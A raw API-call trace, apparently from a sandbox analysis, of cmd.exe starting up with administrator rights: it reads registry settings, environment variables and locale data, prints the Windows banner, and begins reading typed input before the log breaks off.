lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x4, lpData=0x98d077ead0*=0x1, lpcbData=0x98d077eab4*=0x4) returned 0x0 [0199.085] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x0, lpData=0x98d077ead0*=0x1, lpcbData=0x98d077eab4*=0x1000) returned 0x2 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x4, lpData=0x98d077ead0*=0x0, lpcbData=0x98d077eab4*=0x4) returned 0x0 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x4, lpData=0x98d077ead0*=0x40, lpcbData=0x98d077eab4*=0x4) returned 0x0 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x4, lpData=0x98d077ead0*=0x40, lpcbData=0x98d077eab4*=0x4) returned 0x0 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x0, lpData=0x98d077ead0*=0x40, lpcbData=0x98d077eab4*=0x1000) returned 0x2 [0199.086] RegCloseKey (hKey=0x7c) returned 0x0 [0199.086] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x98d077eab8 | out: phkResult=0x98d077eab8*=0x7c) returned 0x0 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x0, lpData=0x98d077ead0*=0x40, lpcbData=0x98d077eab4*=0x1000) returned 0x2 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x4, lpData=0x98d077ead0*=0x1, lpcbData=0x98d077eab4*=0x4) returned 0x0 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x0, lpData=0x98d077ead0*=0x1, lpcbData=0x98d077eab4*=0x1000) returned 0x2 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x4, lpData=0x98d077ead0*=0x0, lpcbData=0x98d077eab4*=0x4) returned 0x0 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x4, lpData=0x98d077ead0*=0x9, lpcbData=0x98d077eab4*=0x4) returned 0x0 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x4, lpData=0x98d077ead0*=0x9, lpcbData=0x98d077eab4*=0x4) returned 0x0 [0199.086] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x0, lpData=0x98d077ead0*=0x9, lpcbData=0x98d077eab4*=0x1000) returned 0x2 [0199.086] RegCloseKey (hKey=0x7c) returned 0x0 [0199.086] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdb5cdc [0199.086] srand (_Seed=0x5cdb5cdc) [0199.086] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0199.086] malloc (_Size=0x4000) returned 0x24bfe7954f0 [0199.087] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0199.087] malloc (_Size=0xffce) returned 0x24bfe8d0080 [0199.087] ??_V@YAXPEAX@Z () returned 0x24bfe8d0080 [0199.088] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x24bfe8d0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0199.088] malloc (_Size=0xffce) returned 0x24bfe8e0060 [0199.088] ??_V@YAXPEAX@Z () returned 0x24bfe8e0060 [0199.088] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24bfe8e0060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0199.089] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0199.089] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0199.089] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0199.089] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0199.089] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0199.089] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0199.089] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0199.089] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0199.089] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0199.089] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0199.089] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0199.089] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0199.089] GetProcessHeap () returned 0x24bfe7d0000 [0199.089] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d64a0) returned 1 [0199.089] GetEnvironmentStringsW () returned 0x24bfe7d5a10* [0199.089] GetProcessHeap () returned 0x24bfe7d0000 [0199.089] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xa94) returned 0x24bfe7d7a10 [0199.089] FreeEnvironmentStringsA (penv="A") returned 1 [0199.089] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0199.089] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0199.089] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0199.090] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0199.090] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0199.090] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0199.090] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0199.090] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0199.090] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0199.090] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0199.090] malloc (_Size=0xffce) returned 0x24bfe8f0040 [0199.090] ??_V@YAXPEAX@Z () returned 0x24bfe8f0040 [0199.091] GetProcessHeap () returned 0x24bfe7d0000 [0199.091] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x40) returned 0x24bfe7d84b0 [0199.091] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x24bfe8f0040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0199.091] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x24bfe8f0040, lpFilePart=0x98d077f630 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x98d077f630*="Desktop") returned 0x17 [0199.091] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0199.091] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x98d077f360 | out: lpFindFileData=0x98d077f360*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x24bfe7d8500 [0199.091] FindClose (in: hFindFile=0x24bfe7d8500 | out: hFindFile=0x24bfe7d8500) returned 1 [0199.092] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x98d077f360 | out: lpFindFileData=0x98d077f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x24bfe7d8500 [0199.092] FindClose (in: hFindFile=0x24bfe7d8500 | out: hFindFile=0x24bfe7d8500) returned 1 [0199.092] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x98d077f360 | out: lpFindFileData=0x98d077f360*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd0d0a21c, ftLastAccessTime.dwHighDateTime=0x1d50ab4, ftLastWriteTime.dwLowDateTime=0xd0d0a21c, ftLastWriteTime.dwHighDateTime=0x1d50ab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x24bfe7d8500 [0199.092] FindClose (in: hFindFile=0x24bfe7d8500 | out: hFindFile=0x24bfe7d8500) returned 1 [0199.092] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0199.092] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0199.092] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0199.092] GetProcessHeap () returned 0x24bfe7d0000 [0199.092] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d7a10) returned 1 [0199.092] GetEnvironmentStringsW () returned 0x24bfe7d0fc0* [0199.092] GetProcessHeap () returned 0x24bfe7d0000 [0199.092] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xacc) returned 0x24bfe7d8500 [0199.092] FreeEnvironmentStringsA (penv="=") returned 1 [0199.092] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x24bfe8d0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0199.093] GetProcessHeap () returned 0x24bfe7d0000 [0199.093] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d84b0) returned 1 [0199.093] ??_V@YAXPEAX@Z () returned 0x1 [0199.093] ??_V@YAXPEAX@Z () returned 0x1 [0199.093] GetProcessHeap () returned 0x24bfe7d0000 [0199.093] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x4016) returned 0x24bfe7d8fe0 [0199.093] GetProcessHeap () returned 0x24bfe7d0000 [0199.093] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d8fe0) returned 1 [0199.093] GetConsoleOutputCP () returned 0x1b5 [0199.854] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7c191fbb0 | out: lpCPInfo=0x7ff7c191fbb0) returned 1 [0199.854] GetUserDefaultLCID () returned 0x409 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff7c191bb78, cchData=8 | out: lpLCData=":") returned 2 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x98d077f9f0, cchData=128 | out: lpLCData="0") returned 2 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x98d077f9f0, cchData=128 | out: lpLCData="0") returned 2 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x98d077f9f0, cchData=128 | out: lpLCData="1") returned 2 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff7c191bb68, cchData=8 | out: lpLCData="/") returned 2 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff7c191bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff7c191bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff7c191ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff7c191ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0199.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff7c191ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0199.855] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff7c191b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0199.855] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff7c191b980, cchData=32 | out: lpLCData="Sun") returned 4 [0199.855] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff7c191bb58, cchData=8 | out: lpLCData=".") returned 2 [0199.855] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff7c191bb40, cchData=8 | out: lpLCData=",") returned 2 [0199.855] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0199.858] GetProcessHeap () returned 0x24bfe7d0000 [0199.858] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, Size=0x20c) returned 0x24bfe7d6560 [0199.858] GetConsoleTitleW (in: lpConsoleTitle=0x24bfe7d6560, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0201.556] _get_osfhandle (_FileHandle=1) returned 0x348 [0201.556] GetFileType (hFile=0x348) returned 0x3 [0201.589] ApiSetQueryApiSetPresence () returned 0x0 [0201.589] ResolveDelayLoadedAPI () returned 0x7ff91a8fd990 [0201.839] BrandingFormatString () returned 0x24bfe7d1850 [0203.241] GetVersion () returned 0x3ad7000a [0203.241] _vsnwprintf (in: _Buffer=0x98d077fb50, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x98d077fae8 | out: _Buffer="10.0.15063") returned 10 [0203.241] _get_osfhandle (_FileHandle=1) returned 0x348 [0203.241] GetFileType (hFile=0x348) returned 0x3 [0203.242] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff7c1927f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0203.242] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff7c1927f60, nSize=0x2000, Arguments=0x98d077faf0 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0203.242] _get_osfhandle (_FileHandle=1) returned 0x348 [0203.242] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0203.242] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x98d077fa48, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077fa48*=0x26, lpOverlapped=0x0) returned 1 [0203.242] _vsnwprintf (in: _Buffer=0x7ff7c1927f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x98d077fb18 | out: _Buffer="\r\n") returned 2 [0203.242] _get_osfhandle (_FileHandle=1) returned 0x348 [0203.242] GetFileType (hFile=0x348) returned 0x3 [0203.242] _get_osfhandle (_FileHandle=1) returned 0x348 [0203.242] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0203.242] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x98d077fae8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077fae8*=0x2, lpOverlapped=0x0) returned 1 [0203.242] _vsnwprintf (in: _Buffer=0x7ff7c1927f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0x98d077fb18 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0203.242] _get_osfhandle (_FileHandle=1) returned 0x348 [0203.242] GetFileType (hFile=0x348) returned 0x3 [0203.242] _get_osfhandle (_FileHandle=1) returned 0x348 [0203.242] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0203.242] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x98d077fae8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077fae8*=0x34, lpOverlapped=0x0) returned 1 [0203.242] _vsnwprintf (in: _Buffer=0x7ff7c1927f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x98d077fb18 | out: _Buffer="\r\n") returned 2 [0203.242] _get_osfhandle (_FileHandle=1) returned 0x348 [0203.242] GetFileType (hFile=0x348) returned 0x3 [0203.242] _get_osfhandle (_FileHandle=1) returned 0x348 [0203.242] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0203.243] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x98d077fae8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077fae8*=0x2, lpOverlapped=0x0) returned 1 [0203.243] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff92fdd0000 [0203.243] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="CopyFileExW") returned 0x7ff92fdee830 [0203.243] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="IsDebuggerPresent") returned 0x7ff92fdee300 [0203.243] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff92f1b0a40 [0203.243] ??_V@YAXPEAX@Z () returned 0x1 [0203.243] _get_osfhandle (_FileHandle=0) returned 0x33c [0203.243] GetFileType (hFile=0x33c) returned 0x3 [0203.243] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0203.243] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x98d077f958 | out: TokenHandle=0x98d077f958*=0x0) returned 0xc000007c [0203.243] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x98d077f958 | out: TokenHandle=0x98d077f958*=0x94) returned 0x0 [0203.243] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0x98d077f908, TokenInformationLength=0x4, ReturnLength=0x98d077f910 | out: TokenInformation=0x98d077f908, ReturnLength=0x98d077f910) returned 0x0 [0203.243] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0x98d077f910, TokenInformationLength=0x4, ReturnLength=0x98d077f908 | out: TokenInformation=0x98d077f910, ReturnLength=0x98d077f908) returned 0x0 [0203.243] NtClose (Handle=0x94) returned 0x0 [0203.243] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x98d077f920, nSize=0x0, Arguments=0x98d077f928 | out: lpBuffer="\x8320\xfe7d\x24b") returned 0xf [0203.244] GetProcessHeap () returned 0x24bfe7d0000 [0203.244] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x218) returned 0x24bfe7d6c30 [0203.713] GetConsoleTitleW (in: lpConsoleTitle=0x98d077f970, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0204.155] wcsstr (_Str="C:\\WINDOWS\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0204.155] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0204.965] GetProcessHeap () returned 0x24bfe7d0000 [0204.965] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d6c30) returned 1 [0204.965] LocalFree (hMem=0x24bfe7d8320) returned 0x0 [0204.966] _vsnwprintf (in: _Buffer=0x7ff7c1927f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x98d077f798 | out: _Buffer="\r\n") returned 2 [0204.966] _get_osfhandle (_FileHandle=1) returned 0x348 [0204.966] GetFileType (hFile=0x348) returned 0x3 [0204.966] _get_osfhandle (_FileHandle=1) returned 0x348 [0204.966] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0204.966] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x98d077f768, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077f768*=0x2, lpOverlapped=0x0) returned 1 [0204.966] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0204.966] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x24bfe8d0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0204.966] malloc (_Size=0x107ce) returned 0x24bfe8e0060 [0204.967] _vsnwprintf (in: _Buffer=0x24bfe8e0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x98d077f7a8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0204.967] _vsnwprintf (in: _Buffer=0x24bfe8e008e, _BufferCount=0x83ce, _Format="%c", _ArgList=0x98d077f7a8 | out: _Buffer=">") returned 1 [0204.967] _get_osfhandle (_FileHandle=1) returned 0x348 [0204.967] GetFileType (hFile=0x348) returned 0x3 [0204.967] _get_osfhandle (_FileHandle=1) returned 0x348 [0204.967] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop>", lpUsedDefaultChar=0x0) returned 25 [0204.967] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x98d077f798, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077f798*=0x18, lpOverlapped=0x0) returned 1 [0204.967] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.967] GetFileType (hFile=0x33c) returned 0x3 [0204.967] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.968] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.968] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c30, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0204.968] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.968] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.968] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c32, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0204.968] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.968] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.968] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c34, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0204.968] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.968] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 